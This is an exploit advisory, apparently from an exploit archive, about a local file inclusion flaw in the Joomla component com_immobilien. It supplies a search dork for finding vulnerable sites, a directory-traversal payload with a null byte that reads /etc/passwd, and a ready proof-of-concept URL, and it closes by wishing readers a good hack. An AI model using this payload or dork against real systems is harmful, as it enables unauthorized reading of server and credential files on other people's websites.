id: 15825
date: 04/11/2011
title: Joomla component com_immobilien LFI Vulnerability
author: z0mbyak
cves: 

Hi from Russia and Greets 2
forum.antichat.ru and rdot.org

Type: LFI
Component: com_immobilien
Version: don't know)
Found: 10.04.2011 by z0mbyak
Dork: inurl:"com_immobilien"

Vuln Code: Find by yourself)

Link:

index.php?option=com_immobilien&controller=

Exploit:

../../../../../../../../../../../etc/passwd%00

PoC:

http://www.vulnsite.name/index.php?

option=com_immobilien&controller=../../../../../../../../../../../etc/passwd%00


P.S Have a good hack)



#  0day.today [2023-03-24]  #